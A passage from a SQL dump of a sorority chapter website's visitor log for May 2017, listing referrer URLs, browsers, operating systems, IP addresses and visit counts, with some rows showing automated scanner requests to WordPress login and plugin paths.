20beta%20sorority%20scholarship%20latr&sc=0-39&sk=&cvid=A3CA6C83BAA94712927DB6034D6F6E77','MSIE','Windows','11.0','','131.156.156.24','000',2,0),(4375,'2017-05-12','http://zphiblgz.org','Firefox','Windows','40.1','','200.196.103.251','000',2,0),(4376,'2017-05-12','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4377,'2017-05-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','192.99.75.64','000',2,0),(4378,'2017-05-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.206','000',1,0),(4379,'2017-05-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(4380,'2017-05-12','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.184','000',1,0),(4381,'2017-05-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.101.139.248','000',1,0),(4382,'2017-05-12','http://zphiblgz.org/','Firefox','Windows','35.0','','192.210.227.190','000',1,0),(4383,'2017-05-12','http://zphiblgz.org','Firefox','Windows','7.0.1','','192.160.102.166','000',1,0),(4384,'2017-05-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','151.80.238.152','000',1,0),(4385,'2017-05-12','http://zphiblgz.org','Firefox','Windows','35.0','','173.44.222.61','000',1,0),(4386,'2017-05-12','http://zphiblgz.org/author/przphiblgz-org/page/2/','Chrome','Windows','48.0.2564.97','','46.161.9.35','000',2,0),(4387,'2017-05-12','http://zphiblgz.org','Firefox','Windows','40.1','','200.82.220.99','000',2,0),(4388,'2017-05-12','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',1,0),(4389,'2017-05-13','https://www.google.com/','Chrome','Windows','58.0.3029.96','','76.21.220.89','000',5,0),(4390,'2017-05-13','http://zphiblgz.org','Firefox','Windows','40.1','','117.98.219.244','000',2,0),(4391,'2017-05-13','http://zphiblgz.org','Firefox','Windows','32.0','','163.172.165.58','000',2,0),(4392,'2017-05-13','http://zphiblgz.org','Chrome','Windows','58.0.3029.96','','95.213.184.251','000',3,0),(4393,'2017-05-13','http://zphiblgz.org','Firefox','Windows','40.1','','112.200.108.243','000',1,0),(4394,'2017-05-13','http://zphiblgz.org','Firefox','Windows','40.1','','217.149.152.130','000',2,0),(4395,'2017-05-13','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.11','000',1,0),(4396,'2017-05-13','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','93.174.93.80','000',1,0),(4397,'2017-05-13','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4398,'2017-05-13','http://zphiblgz.org','Firefox','Windows','34.0','','146.185.223.87','000',1,0),(4399,'2017-05-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.61','000',1,0),(4400,'2017-05-13','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.10','000',1,0),(4401,'2017-05-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','46.166.139.71','000',1,0),(4402,'2017-05-13','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','6.0','','5.61.34.51','000',1,0),(4403,'2017-05-13','http://zphiblgz.org/wp-admin/','MSIE','Windows','9.0','','5.61.34.51','000',1,0),(4404,'2017-05-13','http://zphiblgz.org/','MSIE','Windows','9.0','','180.97.63.81','000',1,0),(4405,'2017-05-13','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','69.143.34.19','000',1,0),(4406,'2017-05-13','http://zphiblgz.org/','Safari','iPhone','10.0','','107.77.241.7','000',1,0),(4407,'2017-05-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(4408,'2017-05-13','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(4409,'2017-05-13','http://zphiblgz.org','Unknown','Unknown','Unknown','','103.6.196.54','000',2,0),(4410,'2017-05-13','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','45.64.1.64','000',1,0),(4411,'2017-05-13','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.87.154.255','000',2,0),(4412,'2017-05-13','http://zphiblgz.org/','Firefox','Windows','34.0','','187.3.172.42','000',3,0),(4413,'2017-05-13','http://zphiblgz.org','Android Browser','Android','4.0','','104.254.244.80','000',7,0),(4414,'2017-05-13','http://zphiblgz.org','Firefox','Windows','34.0','','192.198.80.227','000',1,0),(4415,'2017-05-13','http://zphiblgz.org','Safari','iPhone','8.0','','123.125.71.47','000',1,0),(4416,'2017-05-13','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.14','000',1,0),(4417,'2017-05-13','http://zphiblgz.org','Firefox','Windows','40.1','','109.11.123.161','000',2,0),(4418,'2017-05-13','zphiblgz.org/','Firefox','Windows','52.55.18','','5.50.27.166','000',1,0),(4419,'2017-05-13','https://www.google.com/','Safari','iPhone','10.0','','71.59.222.32','000',1,0),(4420,'2017-05-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','196.52.43.65','000',1,0),(4421,'2017-05-14','http://zphiblgz.org','Firefox','Windows','21.0','','88.99.27.172','000',1,0),(4422,'2017-05-14','http://zphiblgz.org','Firefox','Windows','34.0','','192.198.80.227','000',1,0),(4423,'2017-05-14','http://zphiblgz.org','Firefox','Windows','40.1','','115.134.93.60','000',2,0),(4424,'2017-05-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','82.80.249.214','000',2,0),(4425,'2017-05-14','http://zphiblgz.org','Firefox','Windows','25.0','','82.80.249.219','000',6,0),(4426,'2017-05-14','http://www.zphiblgz.org/','Firefox','Linux','26.0','','82.80.249.219','000',2,0),(4427,'2017-05-14','http://www.zphiblgz.org/','Chrome','Windows','35.0.1916.153','','82.80.249.219','000',1,0),(4428,'2017-05-14','http://www.zphiblgz.org/','MSIE','Windows','11.0','','82.80.249.219','000',5,0),(4429,'2017-05-14','http://www.zphiblgz.org/','Chrome','Macintosh','31.0.1650.57','','82.80.249.219','000',1,0),(4430,'2017-05-14','http://www.zphiblgz.org/','Firefox','Windows','31.0','','82.80.249.219','000',3,0),(4431,'2017-05-14','http://www.zphiblgz.org/','Firefox','Windows','33.0','','82.80.249.219','000',1,0),(4432,'2017-05-14','http://www.zphiblgz.org/','Firefox','Windows','27.0','','82.80.249.219','000',3,0),(4433,'2017-05-14','http://www.zphiblgz.org/','Chrome','Macintosh','31.0.1650.63','','82.80.249.219','000',11,0),(4434,'2017-05-14','http://www.zphiblgz.org/','Chrome','Linux','31.0.1650.63','','82.80.249.219','000',5,0),(4435,'2017-05-14','http://www.zphiblgz.org/','Firefox','Windows','24.0','','82.80.249.219','000',1,0),(4436,'2017-05-14','http://www.zphiblgz.org/','Firefox','Windows','36.0','','82.80.249.219','000',4,0),(4437,'2017-05-14','http://www.zphiblgz.org/','Firefox','Macintosh','26.0','','82.80.249.219','000',3,0),(4438,'2017-05-14','http://zphiblgz.org/members/','Chrome','Windows','32.0.1700.41','','82.80.249.219','000',3,0),(4439,'2017-05-14','http://zphiblgz.org/members/','Safari','Macintosh','6.0.5','','82.80.249.219','000',1,0),(4440,'2017-05-14','http://zphiblgz.org/members/','Chrome','Windows','31.0.1650.63','','82.80.249.219','000',8,0),(4441,'2017-05-14','http://zphiblgz.org/members/','Firefox','Windows','26.0','','82.80.249.219','000',7,0),(4442,'2017-05-14','http://zphiblgz.org/members/','Firefox','Macintosh','25.0','','82.80.249.219','000',1,0),(4443,'2017-05-14','http://zphiblgz.org/members/','Chrome','Windows','32.0.1700.72','','82.80.249.219','000',4,0),(4444,'2017-05-14','http://zphiblgz.org/members/','Safari','Macintosh','5.1.9','','82.80.249.219','000',1,0),(4445,'2017-05-14','http://zphiblgz.org/members/','Chrome','Windows','31.0.1650.57','','82.80.249.219','000',1,0),(4446,'2017-05-14','http://zphiblgz.org/members/','Chrome','Windows','41.0.2227.0','','82.80.249.219','000',1,0),(4447,'2017-05-14','http://zphiblgz.org/members/','Firefox','Windows','27.3','','82.80.249.219','000',4,0),(4448,'2017-05-14','http://zphiblgz.org/members/','Chrome','Windows','12.0.742.91','','82.80.249.219','000',1,0),(4449,'2017-05-14','http://zphiblgz.org/members/','Safari','Macintosh','6.1.1','','82.80.249.219','000',1,0),(4450,'2017-05-14','http://zphiblgz.org/members/','Chrome','Linux','31.0.1650.57','','82.80.249.219','000',2,0),(4451,'2017-05-14','http://zphiblgz.org/members/','MSIE','Windows','10.0','','82.80.249.219','000',2,0),(4452,'2017-05-14','http://zphiblgz.org/programs/','Firefox','Windows','29.0','','82.80.249.219','000',3,0),(4453,'2017-05-14','http://zphiblgz.org/cause/marchofdimes-2/','Firefox','Windows','28.0','','82.80.249.219','000',1,0),(4454,'2017-05-14','http://zphiblgz.org/cause/marchofdimes-2/','Safari','Macintosh','7.0','','82.80.249.219','000',1,0),(4455,'2017-05-14','http://zphiblgz.org/event/breakfast-on-the-go/','Firefox','Linux','25.0','','82.80.249.219','000',1,0),(4456,'2017-05-14','http://zphiblgz.org/author/przphiblgz-org/','Safari','Macintosh','6.1','','82.80.249.219','000',1,0),(4457,'2017-05-14','http://zphiblgz.org/download/constitution-by-laws/','Unknown','Unknown','Unknown','','82.80.249.219','000',1,0),(4458,'2017-05-14','http://zphiblgz.org/download/aarc/','MSIE','Windows','9.0','','82.80.249.219','000',1,0),(4459,'2017-05-14','http://zphiblgz.org/','Safari','iPhone','10.0','','107.77.241.11','000',1,0),(4460,'2017-05-14','http://zphiblgz.org','Firefox','Windows','2.0.0.11','','46.37.191.161','000',1,0),(4461,'2017-05-14','http://zphiblgz.org','Firefox','Windows','40.1','','78.183.7.82','000',2,0),(4462,'2017-05-14','http://zphiblgz.org','Chrome','Windows','39.0.2171.95','','192.198.80.227','000',2,0),(4463,'2017-05-14','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',3,0),(4464,'2017-05-14','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.186','000',2,0),(4465,'2017-05-14','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','62.138.142.11','000',1,0),(4466,'2017-05-14','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','185.52.24.245','000',1,0),(4467,'2017-05-14','http://zphiblgz.org','Chrome','Windows','38.0.2132.45','','138.128.11.155','000',2,0),(4468,'2017-05-14','http://zphiblgz.org','Firefox','Windows','7.0.1','','137.74.224.177','000',1,0),(4469,'2017-05-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','65.19.167.130','000',1,0),(4470,'2017-05-14','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.32.209.26','000',1,0),(4471,'2017-05-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','223.130.27.201','000',1,0),(4472,'2017-05-14','http://zphiblgz.org','Firefox','Windows','33.0','','118.89.176.70','000',2,0),(4473,'2017-05-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','98.143.112.201','000',1,0),(4474,'2017-05-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','64.71.32.17','000',1,0),(4475,'2017-05-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','37.230.106.48','000',1,0),(4476,'2017-05-14','http://zphiblgz.org','Unknown','Unknown','Unknown','','193.143.77.10','000',1,0),(4477,'2017-05-14','https://www.google.com/','Safari','iPhone','10.0','','98.233.149.190','000',1,0),(4478,'2017-05-14','http://zphiblgz.org','Chrome','Windows','58.0.3029.96','','71.179.98.218','000',9,0),(4479,'2017-05-15','http://zphiblgz.org','Firefox','Windows','40.1','','5.94.22.183','000',2,0),(4480,'2017-05-15','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.19','000',1,0),(4481,'2017-05-15','http://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.69','000',1,0),(4482,'2017-05-15','http://zphiblgz.org','Firefox','Windows','40.1','','84.15.179.41','000',2,0),(4483,'2017-05-15','http://zphiblgz.org','MSIE','Windows','8.0','','51.15.56.110','000',8,0),(4484,'2017-05-15','http://zphiblgz.org','MSIE','Windows','8.0','','178.217.187.39','000',9,0),(4485,'2017-05-15','http://zphiblgz.org','Firefox','Windows','40.1','','220.240.131.62','000',2,0),(4486,'2017-05-15','http://zphiblgz.org','Firefox','Windows','40.1','','130.0.29.93','000',2,0),(4487,'2017-05-15','http://zphiblgz.org','Firefox','Windows','40.1','','112.134.44.106','000',2,0),(4488,'2017-05-15','https://www.google.com/','Chrome','Windows','58.0.3029.96','','205.222.248.62','000',2,0),(4489,'2017-05-15','http://zphiblgz.org','Firefox','Windows','40.1','','176.63.155.55','000',1,0),(4490,'2017-05-15','http://zphiblgz.org','Firefox','Windows','40.1','','39.33.224.192','000',2,0),(4491,'2017-05-15','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',2,0),(4492,'2017-05-15','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.171','000',1,0),(4493,'2017-05-15','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiE4PPG0vLTAhXpwlQKHcAlDqgQFggiMAA&url=http%3A%2F%2Fzphiblgz.org%2Fscholarship%2F&usg=AFQjCNGGuWy2KSIOcbzM6-Bb9Xl9Kf1gjQ','MSIE','Windows','11.0','','132.183.13.156','000',1,0),(4494,'2017-05-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.9','000',1,0),(4495,'2017-05-15','http://zphiblgz.org/','Firefox','Windows','7.0.1','','141.170.2.53','000',1,0),(4496,'2017-05-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','176.31.45.3','000',1,0),(4497,'2017-05-15','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4498,'2017-05-15','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','208.113.219.231','000',1,0),(4499,'2017-05-15','http://zphiblgz.org/','Opera Next','Windows','26.0.1656.60','','167.160.176.11','000',3,0),(4500,'2017-05-15','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','82.194.76.36','000',1,0),(4501,'2017-05-15','http://zphiblgz.org','Opera Next','Windows','26.0.1656.60','','167.160.178.117','000',1,0),(4502,'2017-05-15','http://zphiblgz.org','Firefox','Windows','40.1','','37.99.133.138','000',2,0),(4503,'2017-05-15','http://zphiblgz.org','Firefox','Windows','7.0.1','','199.119.112.66','000',2,0),(4504,'2017-05-15','https://www.bing.com/','Edge','Windows','14.14393','','108.85.85.89','000',1,0),(4505,'2017-05-16','http://zphiblgz.org/login/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','MSIE','Windows','8.0','','5.61.35.44','000',1,0),(4506,'2017-05-16','http://zphiblgz.org/wp-admin/','Chrome','Windows','26.0.1410.64','','5.61.35.44','000',1,0),(4507,'2017-05-16','http://zphiblgz.org/members/','Chrome','Windows','48.0.2564.97','','178.159.37.30','000',1,0),(4508,'2017-05-16','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.79','000',7,0),(4509,'2017-05-16','http://zphiblgz.org','Firefox','Windows','40.1','','182.187.66.96','000',2,0),(4510,'2017-05-16','(null)','Firefox','Windows','33.0','','162.243.69.215','000',1,0),(4511,'2017-05-16','http://zphiblgz.org','Firefox','Windows','33.0','','107.170.96.6','000',1,0),(4512,'2017-05-16','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','27.130.61.7','000',1,0),(4513,'2017-05-16','http://zphiblgz.org','Chrome','Windows','36.0.1985.97','','167.160.176.190','000',1,0),(4514,'2017-05-16','http://zphiblgz.org','Firefox','Windows','40.1','','162.251.58.171','000',2,0),(4515,'2017-05-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','185.38.14.171','000',2,0),(4516,'2017-05-16','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','93.174.93.80','000',1,0),(4517,'2017-05-16','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',2,0),(4518,'2017-05-16','http://zphiblgz.org','Firefox','Windows','45.0','','50.242.201.67','000',1,0),(4519,'2017-05-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','62.212.73.141','000',2,0),(4520,'2017-05-16','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',3,0),(4521,'2017-05-16','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.185','000',1,0),(4522,'2017-05-16','http://zphiblgz.org','Chrome','Linux','54.0.2854.84','','185.188.182.33','000',1,0),(4523,'2017-05-16','http://zphiblgz.org','Chrome','Windows','58.0.3029.110','','204.148.27.46','000',3,0),(4524,'2017-05-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','151.80.238.152','000',2,0),(4525,'2017-05-16','http://zphiblgz.org','Chrome','Windows','36.0.1985.97','','167.160.176.192','000',1,0),(4526,'2017-05-16','https://www.google.com/','Chrome','Windows','58.0.3029.110','','76.21.220.89','000',1,0),(4527,'2017-05-16','http://zphiblgz.org/','Firefox','Windows','52.0','','163.172.4.153','000',1,0),(4528,'2017-05-16','http://zphiblgz.org','Firefox','Windows','40.1','','88.172.156.21','000',2,0),(4529,'2017-05-16','http://zphiblgz.org','Firefox','Windows','40.1','','179.36.13.210','000',2,0),(4530,'2017-05-16','https://www.google.com/','Safari','iPhone','10.0','','66.87.85.188','000',2,0),(4531,'2017-05-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.207','000',2,0),(4532,'2017-05-16','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','13.66.58.227','000',2,0),(4533,'2017-05-16','http://zphiblgz.org','Firefox','Windows','7.0.1','','149.202.63.214','000',2,0),(4534,'2017-05-16','http://zphiblgz.org','Unknown','Unknown','Unknown','','122.155.13.51','000',2,0),(4535,'2017-05-17','http://zphiblgz.org/wp-cron.php?doing_wp_cron=1494997863.9705109596252441406250','WordPress','Unknown','4.7.4','','74.220.219.51','000',1,0),(4536,'2017-05-17','http://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',1,0),(4537,'2017-05-17','http://zphiblgz.org/','MSIE','Windows','11.0','','217.115.127.77','000',1,0),(4538,'2017-05-17','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.13','000',1,0),(4539,'2017-05-17','http://zphiblgz.org','Firefox','Windows','32.0','','167.160.176.11','000',1,0),(4540,'2017-05-17','http://zphiblgz.org/','Firefox','Windows','32.0','','202.68.254.99','000',3,0),(4541,'2017-05-17','http://zphiblgz.org','Firefox','Windows','32.0','','192.198.80.227','000',5,0),(4542,'2017-05-17','http://www.bing.com','MSIE','Windows','8.0','','204.13.201.137','000',1,0),(4543,'2017-05-17','http://zphiblgz.org/','MSIE','Windows','10.0','','149.202.98.161','000',1,0),(4544,'2017-05-17','http://zphiblgz.org','Firefox','Windows','40.1','','221.140.108.169','000',2,0),(4545,'2017-05-17','http://zphiblgz.org/index.php','Firefox','Windows','19.0','','91.200.14.171','000',5,0),(4546,'2017-05-17','http://zphiblgz.org','Firefox','Windows','40.1','','106.51.126.140','000',1,0),(4547,'2017-05-17','http://zphiblgz.org','Firefox','Windows','40.1','','41.105.73.245','000',2,0),(4548,'2017-05-17','http://zphiblgz.org','Firefox','Windows','40.1','','150.254.222.25','000',2,0),(4549,'2017-05-17','https://www.google.com/','Chrome','Windows','58.0.3029.110','','71.179.165.166','000',4,0),(4550,'2017-05-17','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0ahUKEwjEupzH8_bTAhXjQpoKHfooDVo4ChAWCCYwAQ&url=http%3A%2F%2Fzphiblgz.org%2Fscholarship%2F&usg=AFQjCNGGuWy2KSIOcbzM6-Bb9Xl9Kf1gjQ','MSIE','Windows','11.0','','131.78.160.229','000',2,0),(4551,'2017-05-17','https://www.google.com/','Chrome','Chrome OS','58.0.3029.112','','174.99.126.201','000',1,0),(4552,'2017-05-17','http://zphiblgz.org','Firefox','Windows','40.1','','200.171.196.58','000',2,0),(4553,'2017-05-17','http://zphiblgz.org','Firefox','Windows','40.1','','110.136.66.220','000',2,0),(4554,'2017-05-17','https://www.google.com/','Chrome','Macintosh','58.0.3029.96','','68.33.73.171','000',1,0),(4555,'2017-05-17','http://zpharm.de/sites/lb/05_pharma_firmen.htm','Firefox','Windows','43.0','','188.129.236.68','000',1,0),(4556,'2017-05-17','http://zphiblgz.org/','Firefox','Windows','32.0','','60.20.210.39','000',3,0),(4557,'2017-05-17','http://zphiblgz.org','Firefox','Windows','40.1','','191.101.58.30','000',2,0),(4558,'2017-05-17','http://zphiblgz.org','Chrome','Windows','36.0.1985.125','','94.41.48.210','000',3,0),(4559,'2017-05-17','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(4560,'2017-05-17','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(4561,'2017-05-17','http://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.69','000',3,0),(4562,'2017-05-17','http://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','178.137.83.166','000',7,0),(4563,'2017-05-17','http://zphiblgz.org','Firefox','Windows','40.1','','191.191.93.254','000',2,0),(4564,'2017-05-17','https://www.google.com/','Chrome','Windows','58.0.3029.96','','100.36.64.181','000',1,0),(4565,'2017-05-17','http://zphiblgz.org','Firefox','Windows','40.1','','39.32.128.241','000',2,0),(4566,'2017-05-17','http://zphiblgz.org','Chrome','Windows','52.0.2743.116','','192.99.66.150','000',13,0),(4567,'2017-05-17','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.70','000',14,0),(4568,'2017-05-17','http://zphiblgz.org','Firefox','Windows','48.0','','149.56.173.81','000',2,0),(4569,'2017-05-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','93.174.93.80','000',2,0),(4570,'2017-05-18','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',2,0),(4571,'2017-05-18','http://zphiblgz.org','Firefox','Windows','40.1','','165.255.253.109','000',2,0),(4572,'2017-05-18','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(4573,'2017-05-18','http://zphiblgz.org','MSIE','Windows','6.0','','213.242.18.190','000',1,0),(4574,'2017-05-18','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','162.99.225.28','000',2,0),(4575,'2017-05-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.34.177','000',3,0),(4576,'2017-05-18','http://zphiblgz.org','Firefox','Windows','34.0','','192.198.80.227','000',3,0),(4577,'2017-05-18','http://zphiblgz.org','MSIE','Windows','11.0','','198.50.180.169','000',2,0),(4578,'2017-05-18','http://zphiblgz.org/membership/','MSIE','Windows','11.0','','45.35.97.39','000',1,0),(4579,'2017-05-18','http://zphiblgz.org','MSIE','Windows','6.0','','5.188.211.13','000',15,0),(4580,'2017-05-18','http://zphiblgz.org/members/','Firefox','Windows','50.0','','178.159.37.30','000',1,0),(4581,'2017-05-18','http://zphiblgz.org','Firefox','Windows','40.1','','201.40.221.118','000',1,0),(4582,'2017-05-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','142.4.16.117','000',1,0),(4583,'2017-05-18','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','114.200.199.40','000',1,0),(4584,'2017-05-18','http://zphiblgz.org','Firefox','Windows','49.0','','149.202.90.29','000',1,0),(4585,'2017-05-18','http://zphiblgz.org','Firefox','Windows','40.1','','118.218.37.231','000',2,0),(4586,'2017-05-18','http://zphiblgz.org/','Firefox','Windows','34.0','','167.160.178.56','000',3,0),(4587,'2017-05-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',3,0),(4588,'2017-05-18','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(4589,'2017-05-18','http://zphiblgz.org','Firefox','Windows','34.0','','167.160.178.117','000',1,0),(4590,'2017-05-18','http://zphiblgz.org/contact/','Chrome','Windows','32.0.1700.107','','195.22.126.101','000',3,0),(4591,'2017-05-18','http://zphiblgz.org','Firefox','Windows','40.1','','73.53.95.88','000',2,0),(4592,'2017-05-18','http://www.google.com/','Chrome','Android','58.0.3029.83','','76.114.227.44','000',1,0),(4593,'2017-05-18','http://zphiblgz.org','Firefox','Windows','19.0','','5.188.211.72','000',1,0),(4594,'2017-05-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','34.210.212.211','000',3,0),(4595,'2017-05-18','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.61','000',1,0),(4596,'2017-05-18','http://zphiblgz.org','MSIE','Windows','11.0','','37.187.78.81','000',1,0),(4597,'2017-05-18','http://zphiblgz.org/wp-content/plugins/revslider/temp/','Chrome','Windows','42.0.2311.152','','216.244.85.106','000',1,0),(4598,'2017-05-18','http://zphiblgz.org','oodlebot','Unknown','1.0','','64.13.155.21','000',1,0),(4599,'2017-05-19','http://zphiblgz.org','Firefox','Windows','34.0','','167.160.176.64','000',1,0),(4600,'2017-05-19','http://zphiblgz.org','Firefox','Windows','40.1','','86.98.9.185','000',2,0),(4601,'2017-05-19','http://zphiblgz.org','Firefox','Windows','34.0','','185.129.148.181','000',3,0),(4602,'2017-05-19','http://zphiblgz.org','Firefox','Windows','40.1','','90.178.191.166','000',2,0),(4603,'2017-05-19','http://zphiblgz.org','Firefox','Windows','48.0','','149.56.173.81','000',4,0),(4604,'2017-05-19','http://zphiblgz.org','Firefox','Windows','3.6.3','','54.185.180.17','000',1,0),(4605,'2017-05-19','https://www.google.com/','Firefox','Macintosh','52.0','','71.244.251.83','000',2,0),(4606,'2017-05-19','http://zphiblgz.org','Firefox','Windows','40.1','','91.127.235.126','000',2,0),(4607,'2017-05-19','http://www.zphibmaryland.org/chapters/','Edge','Windows','13.10586','','98.233.143.92','000',5,0),(4608,'2017-05-19','https://www.google.com/','Safari','iPhone','10.0','','66.87.80.205','000',7,0),(4609,'2017-05-19','https://www.google.com/','Chrome','Windows','58.0.3029.110','','108.171.132.162','000',1,0),(4610,'2017-05-19','http://zphiblgz.org','Chrome','Windows','40.0.2214.115','','45.32.130.173','000',1,0),(4611,'2017-05-19','http://zphiblgz.org','Firefox','Windows','35.0','','167.160.176.190','000',1,0),(4612,'2017-05-19','https://www.google.com/','Chrome','Windows','48.0.2564.109','','216.99.184.50','000',1,0),(4613,'2017-05-19','http://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.86','000',1,0),(4614,'2017-05-19','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','46.229.170.197','000',2,0),(4615,'2017-05-19','http://zphiblgz.org','Firefox','Windows','40.1','','189.26.181.113','000',2,0),(4616,'2017-05-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',2,0),(4617,'2017-05-19','http://zphiblgz.org/','Firefox','Windows','35.0','','167.160.178.117','000',3,0),(4618,'2017-05-19','http://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(4619,'2017-05-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','162.247.72.202','000',1,0),(4620,'2017-05-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','168.1.128.76','000',1,0),(4621,'2017-05-19','http://zphiblgz.org','Chrome','Windows','57.0.2987.133','','162.243.224.140','000',1,0),(4622,'2017-05-19','https://www.google.com.gh/','Chrome','Android','46.0.2490.76','','41.189.161.44','000',1,0),(4623,'2017-05-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','109.163.234.7','000',1,0),(4624,'2017-05-19','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.170.42.4','000',1,0),(4625,'2017-05-19','http://zphiblgz.org','Firefox','Windows','7.0.1','','87.117.197.109','000',1,0),(4626,'2017-05-19','https://www.google.com/','Chrome','Windows','58.0.3029.110','','73.212.147.35','000',1,0),(4627,'2017-05-19','http://zphiblgz.org','Chrome','Linux','43.0.2357.130','','93.174.93.80','000',1,0),(4628,'2017-05-19','http://zphiblgz.org','curl','Unknown','7.47.0','','93.174.93.80','000',1,0),(4629,'2017-05-19','http://zphiblgz.org','Firefox','Windows','31.0','','172.245.250.253','000',2,0),(4630,'2017-05-19','http://zphiblgz.org','Unknown','Unknown','Unknown','','199.87.255.44','000',1,0),(4631,'2017-05-19','http://zphiblgz.org','Firefox','Windows','35.0','','167.160.178.56','000',1,0),(4632,'2017-05-19','http://zphiblgz.org','Firefox','Windows','40.1','','50.173.227.95','000',2,0),(4633,'2017-05-20','http://zphiblgz.org','Firefox','Windows','35.0','','167.160.176.192','000',1,0),(4634,'2017-05-20','http://zphiblgz.org','oodlebot','Unknown','1.0','','64.13.155.21','000',1,0),(4635,'2017-05-20','http://zphiblgz.org','Firefox','Windows','40.1','','112.198.82.189','000',2,0),(4636,'2017-05-20','https://search.yahoo.com/','Firefox','Windows','53.0','','98.185.16.67','000',2,0),(4637,'2017-05-20','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','171.7.107.167','000',1,0),(4638,'2017-05-20','http://zphiblgz.org/wp-login.php','Chrome','Windows','53.0.2785.143','','107.3.254.77','000',1,0),(4639,'2017-05-20','http://zphiblgz.org','Firefox','Windows','40.1','','90.32.148.101','000',2,0),(4640,'2017-05-20','http://zphiblgz.org','Firefox','Windows','40.1','','138.75.151.140','000',2,0),(4641,'2017-05-20','http://zphiblgz.org','Chrome','Windows','58.0.